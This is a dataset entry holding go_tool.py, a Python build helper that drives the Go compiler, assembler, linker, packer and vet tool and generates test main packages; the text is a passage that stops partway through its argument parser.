source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
go_tool.py | import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
# Prefix turning an Arcadia project path into a Go import path.
arc_project_prefix = 'a.yandex-team.ru/'
# Location of the vendored Go standard library sources inside the repo.
std_lib_prefix = 'contrib/go/_std/src/'
# Marker directory for vendored third-party Go packages.
vendor_prefix = 'vendor/'
# Default extensions for the machine-readable vet output and the text report.
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
# Suffix produced by the cgo preprocessing step for translated cgo sources.
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
# Flags that disable optimization; stripped when compiling runtime packages.
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
    """Return the '-trimpath' tool arguments, or an empty list when unset."""
    if args.trimpath:
        return ['-trimpath', args.trimpath]
    return []
def preprocess_cgo1(src_path, dst_path, source_root):
    """Copy src_path to dst_path, substituting the Arcadia source-root placeholder."""
    with open(src_path, 'r') as src:
        text = src.read()
    with open(dst_path, 'w') as dst:
        dst.write(text.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root))
def preprocess_args(args):
    """Normalize and augment the parsed command-line namespace in place.

    Computes toolchain tool paths, normalizes root directories, derives the
    module/import paths, orders source lists, and rewrites preprocessed cgo
    sources into the output root.
    """
    # Temporary work around for noauto
    if args.cgo_srcs and len(args.cgo_srcs) > 0:
        cgo_srcs_set = set(args.cgo_srcs)
        args.srcs = list(filter(lambda x: x not in cgo_srcs_set, args.srcs))

    args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
    toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
    args.go_compile = os.path.join(toolchain_tool_root, 'compile')
    args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
    args.go_link = os.path.join(toolchain_tool_root, 'link')
    args.go_asm = os.path.join(toolchain_tool_root, 'asm')
    args.go_pack = os.path.join(toolchain_tool_root, 'pack')
    # ++vet is either a bare flag (True -> use the toolchain vet) or a path.
    args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
    args.output = os.path.normpath(args.output)
    args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
    args.trimpath = None
    if args.debug_root_map:
        # debug_root_map is 'src=dst;...' where src is build/source/tools.
        roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
        replaces = []
        for root in args.debug_root_map.split(';'):
            src, dst = root.split('=', 1)
            assert src in roots
            replaces.append('{}=>{}'.format(roots[src], dst))
            # Each root may be remapped at most once.
            del roots[src]
        assert len(replaces) > 0
        args.trimpath = ';'.join(replaces)
    args.build_root = os.path.normpath(args.build_root)
    args.build_root_dir = args.build_root + os.path.sep
    args.source_root = os.path.normpath(args.source_root)
    args.source_root_dir = args.source_root + os.path.sep
    args.output_root = os.path.normpath(args.output_root)
    args.import_map = {}
    args.module_map = {}
    if args.cgo_peers:
        args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]

    # test/xtest sources are only meaningful in 'test' mode.
    assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
    # add lexical order by basename for go sources
    args.srcs.sort(key=lambda x: os.path.basename(x))
    if args.test_srcs:
        args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
        del args.test_srcs
    if args.xtest_srcs:
        args.xtest_srcs.sort(key=lambda x: os.path.basename(x))

    # compute root relative module dir path
    assert args.output is None or args.output_root == os.path.dirname(args.output)
    assert args.output_root.startswith(args.build_root_dir)
    args.module_path = args.output_root[len(args.build_root_dir):]
    assert len(args.module_path) > 0
    args.import_path, args.is_std = get_import_path(args.module_path)

    # NOTE(review): no '++word' option is declared by the argument parser, so
    # this would raise AttributeError whenever ++asmhdr is passed — confirm
    # whether 'args.word' is dead code or a typo.
    assert args.asmhdr is None or args.word == 'go'

    srcs = []
    for f in args.srcs:
        # Rewrite preprocessed cgo sources into the output root, substituting
        # the source-root placeholder on the way.
        if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
            path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
            srcs.append(path)
            preprocess_cgo1(f, path, args.source_root)
        else:
            srcs.append(f)
    args.srcs = srcs

    classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
    """Compare two dotted decimal version strings numerically.

    Returns 0 when equal, 1 when version1 < version2 (version2 is newer),
    and -1 otherwise. Note the inverted sign relative to the usual cmp().
    """
    def parse(version):
        # Compare integer tuples directly: the previous zfill(8) string
        # padding silently mis-ordered components longer than 8 digits.
        return tuple(int(part) for part in version.split('.'))

    v1 = parse(version1)
    v2 = parse(version2)
    if v1 == v2:
        return 0
    return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
    """Return os.symlink when the platform provides it, else shutil.copyfile."""
    return getattr(os, 'symlink', None) or shutil.copyfile
def copy_args(args):
    """Shallow-copy the args namespace so per-target fields can be overridden."""
    duplicate = copy.copy(args)
    return duplicate
def get_vendor_index(import_path):
    """Index where the vendored part of import_path begins, or -1 if not vendored."""
    pos = import_path.rfind('/' + vendor_prefix)
    if pos >= 0:
        # Skip the leading '/' so the index points at 'vendor/'.
        return pos + 1
    return 0 if import_path.startswith(vendor_prefix) else -1
def get_import_path(module_path):
    """Map an Arcadia module path to (go_import_path, is_std_module)."""
    assert len(module_path) > 0
    import_path = module_path.replace('\\', '/')
    is_std_module = import_path.startswith(std_lib_prefix)
    if is_std_module:
        # Standard library packages are imported by their bare path.
        import_path = import_path[len(std_lib_prefix):]
    elif import_path.startswith(vendor_prefix):
        import_path = import_path[len(vendor_prefix):]
    else:
        # Everything else lives under the Arcadia project prefix.
        import_path = arc_project_prefix + import_path
    assert len(import_path) > 0
    return import_path, is_std_module
def call(cmd, cwd, env=None):
    """Run cmd in cwd capturing combined stdout/stderr.

    Raises subprocess.CalledProcessError on a non-zero exit status.
    """
    # print >>sys.stderr, ' '.join(cmd)
    output = subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
    return output
def classify_srcs(srcs, args):
    """Split srcs by extension into go/asm/object/symabis/syso lists on args."""
    args.go_srcs = [src for src in srcs if src.endswith('.go')]
    args.asm_srcs = [src for src in srcs if src.endswith('.s')]
    args.objects = [src for src in srcs if src.endswith(('.o', '.obj'))]
    args.symabis = [src for src in srcs if src.endswith('.symabis')]
    args.sysos = [src for src in srcs if src.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map=None, module_map=None):
    """Collect importcfg data for the given peer package archives.

    Returns a dict with 'importmap' (list of (alias, real) pairs),
    'packagefile' (list of (import_path, archive_path) pairs) and
    'standard' (set-like dict of std-lib import paths).
    """
    # None defaults instead of shared mutable default arguments.
    import_map = import_map or {}
    module_map = module_map or {}
    info = {'importmap': [], 'packagefile': [], 'standard': {}}
    if gen_importmap:
        for key, value in import_map.items():
            info['importmap'].append((key, value))
    for peer in peers:
        peer_import_path, is_std = get_import_path(os.path.dirname(peer))
        if gen_importmap:
            index = get_vendor_index(peer_import_path)
            if index >= 0:
                # Map the unvendored alias to the full vendored path.
                index += len(vendor_prefix)
                info['importmap'].append((peer_import_path[index:], peer_import_path))
        # NOTE(review): 'args' is the module-level namespace assigned in
        # __main__, not a parameter — this branch only works when the module
        # is executed as a script; confirm.
        info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
        if is_std:
            info['standard'][peer_import_path] = True
    for key, value in module_map.items():
        info['packagefile'].append((key, value))
    return info
def create_import_config(peers, gen_importmap, import_map=None, module_map=None):
    """Write an importcfg file for the compiler/linker and return its path.

    Returns None when there is nothing to record. The file is created with
    delete=False, so the caller (or the build sandbox) owns its lifetime.
    """
    # None defaults instead of shared mutable default arguments.
    lines = []
    info = get_import_config_info(peers, gen_importmap, import_map or {}, module_map or {})
    for key in ('importmap', 'packagefile'):
        for item in info[key]:
            lines.append('{} {}={}'.format(key, *item))
    if lines:
        # Trailing newline terminates the last directive.
        lines.append('')
        content = '\n'.join(lines)
        # print >>sys.stderr, content
        # mode='w': writing str works on both Python 2 and 3 (the default
        # 'w+b' mode rejects str on Python 3).
        with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
            f.write(content)
            return f.name
    return None
def vet_info_output_name(path, ext=None):
    """Append the vet info extension (default: vet_info_ext) to path."""
    suffix = ext if ext else vet_info_ext
    return path + suffix
def vet_report_output_name(path, ext=None):
    """Append the vet report extension (default: vet_report_ext) to path."""
    suffix = ext if ext else vet_report_ext
    return path + suffix
def get_source_path(args):
    """Module path used to locate sources; test_import_path takes precedence."""
    if args.test_import_path:
        return args.test_import_path
    return args.module_path
def gen_vet_info(args):
    """Build the JSON config dict that the 'go vet -json' driver consumes.

    Every peer package is mapped to itself in ImportMap (plus the collected
    aliases), and PackageVetx points at the peers' vet-info outputs.
    """
    # For test binaries the real import path differs from the mangled one.
    import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
    info = get_import_config_info(args.peers, True, args.import_map, args.module_map)

    import_map = dict(info['importmap'])
    # FIXME(snermolaev): it seems that adding import map for 'fake' package
    # does't make any harm (it needs to be revised later)
    import_map['unsafe'] = 'unsafe'
    # Identity-map every package that has an archive but no explicit alias.
    for (key, _) in info['packagefile']:
        if key not in import_map:
            import_map[key] = key

    data = {
        'ID': import_path,
        'Compiler': 'gc',
        'Dir': os.path.join(args.source_root, get_source_path(args)),
        'ImportPath': import_path,
        'GoFiles': list(filter(lambda x: x.endswith('.go'), args.go_srcs)),
        'NonGoFiles': list(filter(lambda x: not x.endswith('.go'), args.go_srcs)),
        'ImportMap': import_map,
        'PackageFile': dict(info['packagefile']),
        'Standard': dict(info['standard']),
        'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
        'VetxOnly': False,
        'VetxOutput': vet_info_output_name(args.output),
        'SucceedOnTypecheckFailure': False
    }
    # print >>sys.stderr, json.dumps(data, indent=4)
    return data
def create_vet_config(args, info):
    """Serialize the vet config dict to a persistent temp .cfg file.

    Returns the file name; the file is kept (delete=False) for the vet run.
    """
    # mode='w': json.dumps returns str, which the default binary mode would
    # reject on Python 3.
    with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg', mode='w') as f:
        f.write(json.dumps(info))
        return f.name
def decode_vet_report(json_report):
    """Decode 'go vet -json' output into a sorted human-readable report.

    Returns '' for empty input and the raw input unchanged when it is not
    valid JSON (vet emits plain text for fatal errors).
    """
    if not json_report:
        return ''
    try:
        # json.loads works on Python 2 and 3 alike; the previous
        # JSONDecoder(encoding='UTF-8') form was Python 2 only.
        full_diags = json.loads(json_report)
    except ValueError:
        return json_report
    messages = []
    # .items()/.values() instead of Python2-only iteritems() — keys are unused.
    for module_diags in full_diags.values():
        for type_diags in module_diags.values():
            for diag in type_diags:
                messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
    return '\n'.join(sorted(messages)).encode('UTF-8')
def dump_vet_report(args, report):
    """Write the vet report with build/source roots abbreviated to $B/$S.

    Does nothing when the report is empty.
    """
    if not report:
        return
    abbreviated = report.replace(args.build_root, '$B').replace(args.source_root, '$S')
    with open(args.vet_report_output, 'w') as out:
        out.write(abbreviated)
def read_vet_report(args):
    """Return the contents of args.vet_report_output, or '' when absent."""
    assert args
    if not os.path.exists(args.vet_report_output):
        return ''
    with open(args.vet_report_output, 'r') as src:
        return src.read()
def dump_vet_report_for_tests(args, *test_args_list):
    """Concatenate the vet reports of the given (non-None) test args and dump
    the combined report under 'args'.
    """
    # str.join over a generator replaces the Python2-only builtin reduce()
    # (and its quadratic '+' concatenation).
    combined = ''.join(read_vet_report(x) for x in test_args_list if x)
    dump_vet_report(args, combined)
def do_vet(args):
    """Run 'go vet' with the generated config and dump its report.

    Raises subprocess.CalledProcessError (with vet's stderr as output) when
    vet exits non-zero; the report is dumped either way.
    """
    assert args.vet
    info = gen_vet_info(args)
    vet_config = create_vet_config(args, info)
    cmd = [args.go_vet, '-json']
    if args.vet_flags:
        cmd.extend(args.vet_flags)
    cmd.append(vet_config)
    # print >>sys.stderr, '>>>> [{}]'.format(' '.join(cmd))
    p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
    vet_out, vet_err = p_vet.communicate()
    report = decode_vet_report(vet_out) if vet_out else ''
    dump_vet_report(args, report)
    if p_vet.returncode:
        raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
    """Invoke 'go tool compile' for the current module.

    Assembles the command line (import config, std/runtime flags, symabis,
    user compile flags) and runs it from the build root.
    """
    import_path, is_std_module = args.import_path, args.is_std
    cmd = [
        args.go_compile,
        '-o',
        args.output,
        '-p',
        import_path,
        '-D',
        '""',
        '-goversion',
        'go{}'.format(args.goversion)
    ]
    cmd.extend(get_trimpath_args(args))
    if is_std_module:
        cmd.append('-std')
        # The runtime packages need the compiler's special runtime mode.
        if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
            cmd.append('-+')
    import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
    if import_config_name:
        cmd += ['-importcfg', import_config_name]
    else:
        if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
            pass
        else:
            # No imports and no non-Go parts: the package is self-contained.
            cmd.append('-complete')
    if args.asmhdr:
        cmd += ['-asmhdr', args.asmhdr]
    # compare_versions(v, goversion) >= 0 means goversion >= v.
    if compare_versions('1.12', args.goversion) >= 0:
        if args.symabis:
            cmd += ['-symabis'] + args.symabis
        if compare_versions('1.13', args.goversion) >= 0:
            pass
        elif import_path in ('runtime', 'runtime/internal/atomic'):
            # -allabis was required for these packages only on Go 1.12.
            cmd.append('-allabis')
    compile_workers = '4'
    if args.compile_flags:
        if import_path == 'runtime' or import_path.startswith('runtime/'):
            # Never disable optimizations when compiling the runtime.
            cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
        else:
            cmd.extend(args.compile_flags)
        if any(map(lambda x: x in ('-race', '-shared'), args.compile_flags)):
            compile_workers = '1'
    cmd += ['-pack', '-c={}'.format(compile_workers)]
    cmd += args.go_srcs
    call(cmd, args.build_root)
class VetThread(threading.Thread):
    """Thread wrapper that captures any exception raised by its target.

    The saved exc_info triple can be re-raised on the joining thread so a
    vet failure surfaces after compilation has finished.
    """

    def __init__(self, target, args):
        super(VetThread, self).__init__(target=target, args=args)
        # sys.exc_info() triple captured in run(), or None on success.
        self.exc_info = None

    def run(self):
        try:
            super(VetThread, self).run()
        except:
            # Intentionally broad: every failure must reach the joiner.
            self.exc_info = sys.exc_info()

    def join_with_exception(self, reraise_exception):
        """Join; re-raise the captured exception only when asked to."""
        self.join()
        if reraise_exception and self.exc_info:
            # Python 2 three-argument raise preserves the original traceback.
            raise self.exc_info[0], self.exc_info[1], self.exc_info[2]
def do_compile_go(args):
    """Compile Go sources, running 'go vet' concurrently when requested.

    A vet failure is re-raised only if compilation itself succeeded, so a
    compile error is always reported first.
    """
    vet_thread = None
    if args.vet:
        vet_thread = VetThread(target=do_vet, args=(args,))
        vet_thread.start()
    propagate_vet_failure = False
    try:
        _do_compile_go(args)
        propagate_vet_failure = True
    finally:
        if vet_thread is not None:
            vet_thread.join_with_exception(propagate_vet_failure)
def do_compile_asm(args):
    """Assemble the single .s source in args into args.output via 'go tool asm'."""
    assert len(args.srcs) == 1 and len(args.asm_srcs) == 1
    cmd = [args.go_asm]
    cmd.extend(get_trimpath_args(args))
    cmd.extend(['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')])
    cmd.extend(['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output])
    if args.asm_flags:
        cmd.extend(args.asm_flags)
    cmd.extend(args.asm_srcs)
    call(cmd, args.build_root)
def do_link_lib(args):
    """Build a Go package archive: compile Go (and asm) then pack objects.

    When assembler sources are present, the Go compilation first emits
    go_asm.h, each .s file is assembled separately, and the resulting objects
    (plus any .syso files) are appended to the archive with 'go tool pack'.
    """
    if len(args.asm_srcs) > 0:
        asmargs = copy_args(args)
        asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
        do_compile_go(asmargs)
        for src in asmargs.asm_srcs:
            # Reuse the same namespace, re-pointing srcs/output per .s file.
            asmargs.srcs = [src]
            asmargs.asm_srcs = [src]
            asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
            do_compile_asm(asmargs)
            # Collect the freshly assembled object for the pack step below.
            args.objects.append(asmargs.output)
    else:
        do_compile_go(args)
    if args.objects:
        cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
        call(cmd, args.build_root)
def do_link_exe(args):
    """Link an executable (or c-shared DLL): build 'main.a' then 'go tool link'.

    Handles musl static linking and splices cgo peer libraries into
    -extldflags (wrapped in --start/--end-group on Linux).
    """
    assert args.extld is not None
    assert args.non_local_peers is not None
    compile_args = copy_args(args)
    compile_args.output = os.path.join(args.output_root, 'main.a')
    # Keep the real import path for vet; the compiler sees package 'main'.
    compile_args.real_import_path = compile_args.import_path
    compile_args.import_path = 'main'

    if args.vcs and os.path.isfile(compile_args.vcs):
        build_info = os.path.join('library', 'go', 'core', 'buildinfo')
        # Only embed VCS info when the buildinfo library is among the peers.
        if any(map(lambda x: x.startswith(build_info), compile_args.peers)):
            compile_args.go_srcs.append(compile_args.vcs)

    do_link_lib(compile_args)
    cmd = [args.go_link, '-o', args.output]
    import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
    if import_config_name:
        cmd += ['-importcfg', import_config_name]
    if args.link_flags:
        cmd += args.link_flags
    if args.mode in ('exe', 'test'):
        cmd.append('-buildmode=exe')
    elif args.mode == 'dll':
        cmd.append('-buildmode=c-shared')
    else:
        assert False, 'Unexpected mode: {}'.format(args.mode)
    cmd.append('-extld={}'.format(args.extld))
    extldflags = []
    if args.extldflags is not None:
        filter_musl = None
        if args.musl:
            cmd.append('-linkmode=external')
            extldflags.append('-static')
            # Drop dynamic libc-family flags when statically linking with musl.
            filter_musl = lambda x: not x in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
        extldflags += list(filter(filter_musl, args.extldflags))
    cgo_peers = []
    if args.cgo_peers is not None and len(args.cgo_peers) > 0:
        # Group the cgo libraries on Linux so link order does not matter.
        is_group = args.targ_os == 'linux'
        if is_group:
            cgo_peers.append('-Wl,--start-group')
        cgo_peers.extend(os.path.join(args.build_root, x) for x in args.cgo_peers)
        if is_group:
            cgo_peers.append('-Wl,--end-group')
    try:
        # '--cgo-peers' is a placeholder marking where the cgo libraries
        # should be spliced in; otherwise they are appended at the end.
        index = extldflags.index('--cgo-peers')
        extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
    except ValueError:
        extldflags.extend(cgo_peers)
    if len(extldflags) > 0:
        cmd.append('-extldflags={}'.format(' '.join(extldflags)))
    cmd.append(compile_args.output)
    call(cmd, args.build_root)
def gen_cover_info(args):
    """Generate Go source lines that register coverage data with 'testing'.

    args.cover_info entries are 'var:file' pairs produced by the cover tool;
    each one becomes a coverRegisterFile call in the generated init().
    """
    lines = []
    lines.extend([
        """
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
        'func init() {',
    ])
    for var, file in (x.split(':') for x in args.cover_info):
        lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
    lines.extend([
        '}',
        """
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
    ])
    return lines
def filter_out_skip_tests(tests, skip_tests):
    """Remove tests matching skip_tests; entries containing '*' are wildcards.

    Exact names are matched via a set; '*' entries are combined into one
    anchored regular expression in which '*' means '.*'.
    """
    skip_set = set()
    star_skip_set = set()
    for t in skip_tests:
        work_set = star_skip_set if '*' in t else skip_set
        work_set.add(t)
    re_star_tests = None
    if star_skip_set:
        re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
    # Match exact names against skip_set — it was built but left unused
    # before (the list was searched instead, O(n) per test and including the
    # wildcard entries as literals).
    return [x for x in tests if not (x in skip_set or re_star_tests and re_star_tests.match(x))]
def gen_test_main(args, test_lib_args, xtest_lib_args):
    """Generate the Go source of the test 'main' package as a string.

    Mines Test/Benchmark/Example functions from the built test libraries with
    the test-miner tool (run against a synthetic GOPATH), honours skip lists
    and a user-provided TestMain, and wires in coverage registration when
    cover_info is set. Relies on Python 2 filter() returning a list.
    """
    assert args and (test_lib_args or xtest_lib_args)
    test_miner = args.test_miner
    test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
    is_cover = args.cover_info and len(args.cover_info) > 0

    # Prepare GOPATH
    # $BINDIR
    #    |- __go__
    #        |- src
    #        |- pkg
    #            |- ${TARGET_OS}_${TARGET_ARCH}
    go_path_root = os.path.join(args.output_root, '__go__')
    test_src_dir = os.path.join(go_path_root, 'src')
    target_os_arch = '_'.join([args.targ_os, args.targ_arch])
    test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
    os.makedirs(test_pkg_dir)

    my_env = os.environ.copy()
    my_env['GOROOT'] = ''
    my_env['GOPATH'] = go_path_root
    my_env['GOARCH'] = args.targ_arch
    my_env['GOOS'] = args.targ_os

    tests = []
    xtests = []
    os_symlink = get_symlink_or_copyfile()

    # Get the list of "internal" tests
    if test_lib_args:
        os.makedirs(os.path.join(test_src_dir, test_module_path))
        os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
        cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
        tests = filter(lambda x: len(x) > 0, (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n'))
        if args.skip_tests:
            tests = filter_out_skip_tests(tests, args.skip_tests)
    # The miner emits '#TestMain' when the package defines its own TestMain.
    test_main_found = '#TestMain' in tests

    # Get the list of "external" tests
    if xtest_lib_args:
        xtest_module_path = xtest_lib_args.import_path
        os.makedirs(os.path.join(test_src_dir, xtest_module_path))
        os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
        cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
        xtests = filter(lambda x: len(x) > 0, (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n'))
        if args.skip_tests:
            xtests = filter_out_skip_tests(xtests, args.skip_tests)
    xtest_main_found = '#TestMain' in xtests

    test_main_package = None
    if test_main_found and xtest_main_found:
        assert False, 'multiple definition of TestMain'
    elif test_main_found:
        test_main_package = '_test'
    elif xtest_main_found:
        test_main_package = '_xtest'

    # The synthetic GOPATH is only needed while the miner runs.
    shutil.rmtree(go_path_root)

    lines = ['package main', '', 'import (']
    if test_main_package is None:
        # os is only needed for the default os.Exit(m.Run()) epilogue.
        lines.append(' "os"')
    lines.extend([' "testing"', ' "testing/internal/testdeps"'])

    if len(tests) > 0:
        lines.append(' _test "{}"'.format(test_module_path))
    elif test_lib_args:
        # Import for side effects only, so the package is still linked in.
        lines.append(' _ "{}"'.format(test_module_path))

    if len(xtests) > 0:
        lines.append(' _xtest "{}"'.format(xtest_module_path))
    elif xtest_lib_args:
        lines.append(' _ "{}"'.format(xtest_module_path))

    if is_cover:
        lines.append(' _cover0 "{}"'.format(test_module_path))
    lines.extend([')', ''])

    for kind in ['Test', 'Benchmark', 'Example']:
        lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
        for test in list(filter(lambda x: x.startswith(kind), tests)):
            lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
        for test in list(filter(lambda x: x.startswith(kind), xtests)):
            lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
        lines.extend(['}', ''])

    if is_cover:
        lines.extend(gen_cover_info(args))

    lines.append('func main() {')
    if is_cover:
        lines.extend([
            ' testing.RegisterCover(testing.Cover{',
            ' Mode: "set",',
            ' Counters: coverCounters,',
            ' Blocks: coverBlocks,',
            ' CoveredPackages: "",',
            ' })',
        ])
    # NOTE(review): a comma appears to be missing after the MainStart line, so
    # the two literals are implicitly concatenated and the intended blank line
    # is never emitted. Harmless for the generated Go — confirm intent.
    lines.extend([
        ' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)'
        '',
    ])
    if test_main_package:
        lines.append(' {}.TestMain(m)'.format(test_main_package))
    else:
        lines.append(' os.Exit(m.Run())')
    lines.extend(['}', ''])
    content = '\n'.join(lines)
    # print >>sys.stderr, content
    return content
def do_link_test(args):
    """Build and link a Go test binary.

    Compiles the internal test library (test.a) and the external one
    (xtest.a), merges per-library vet ydx files when both exist, generates
    and compiles the test main package, and finally links the executable.
    """
    assert args.srcs or args.xtest_srcs
    assert args.test_miner is not None

    test_module_path = get_source_path(args)
    test_import_path, _ = get_import_path(test_module_path)

    test_lib_args = copy_args(args) if args.srcs else None
    xtest_lib_args = copy_args(args) if args.xtest_srcs else None

    ydx_file_name = None
    xtest_ydx_file_name = None
    need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
    if need_append_ydx:
        def find_ydx_file_name(name, flags):
            # Locate the vet flag that references the ydx file.
            for i, elem in enumerate(flags):
                if elem.endswith(name):
                    return (i, elem)
            assert False, 'Unreachable code'

        # Redirect the xtest vet run to its own ydx file so the two library
        # builds do not clobber each other; the files are merged below.
        idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
        xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
        xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
        xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name

    if test_lib_args:
        test_lib_args.output = os.path.join(args.output_root, 'test.a')
        test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
        test_lib_args.module_path = test_module_path
        test_lib_args.import_path = test_import_path
        do_link_lib(test_lib_args)

    if xtest_lib_args:
        xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
        classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
        xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
        xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
        xtest_lib_args.module_path = test_module_path + '_test'
        xtest_lib_args.import_path = test_import_path + '_test'
        if test_lib_args:
            xtest_lib_args.module_map[test_import_path] = test_lib_args.output
        # NOTE(review): this overwrites the flag computed above; both forms
        # appear to evaluate equivalently (test_lib_args <=> args.srcs), so
        # the re-assignment looks redundant — confirm.
        need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
        do_link_lib(xtest_lib_args)

    if need_append_ydx:
        # Append the xtest ydx output onto the main ydx file.
        with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
            with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
                dst_file.write(src_file.read())

    test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
    test_main_name = os.path.join(args.output_root, '_test_main.go')
    with open(test_main_name, "w") as f:
        f.write(test_main_content)

    test_args = copy_args(args)
    test_args.srcs = [test_main_name]
    if test_args.test_import_path is None:
        # it seems that we can do it unconditionally, but this kind
        # of mangling doesn't really looks good to me and we leave it
        # for pure GO_TEST module
        test_args.module_path = test_args.module_path + '___test_main__'
        test_args.import_path = test_args.import_path + '___test_main__'
    classify_srcs(test_args.srcs, test_args)
    if test_lib_args:
        test_args.module_map[test_lib_args.import_path] = test_lib_args.output
    if xtest_lib_args:
        test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output

    if args.vet:
        # The libraries were already vetted; just merge their reports.
        dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
    test_args.vet = False

    do_link_exe(test_args)
if __name__ == '__main__':
    # Support @response-file notation for windows to reduce cmd length
    if sys.argv[1].startswith('@'):
        with open(sys.argv[1][1:]) as afile:
            args = afile.read().splitlines()
            sys.argv[:] = [sys.argv[0]] + args + sys.argv[2:]

    # '+' is used as the option prefix so that '-'-style flags can be passed
    # through to the Go tools untouched.
    parser = argparse.ArgumentParser(prefix_chars='+')
    parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
    parser.add_argument('++srcs', nargs='*', required=True)
    parser.add_argument('++cgo-srcs', nargs='*')
    parser.add_argument('++test_srcs', nargs='*')
    parser.add_argument('++xtest_srcs', nargs='*')
    parser.add_argument('++cover_info', nargs='*')
    parser.add_argument('++output', nargs='?', default=None)
    parser.add_argument('++source-root', default=None)
    parser.add_argument('++build-root', required=True)
    parser.add_argument('++tools-root', default=None)
    parser.add_argument('++output-root', required=True)
    parser.add_argument('++toolchain-root', required=True)
    parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
    parser.add_argument('++host-arch', choices=['amd64'], required=True)
    parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
    parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
    parser.add_argument('++peers', nargs='*')
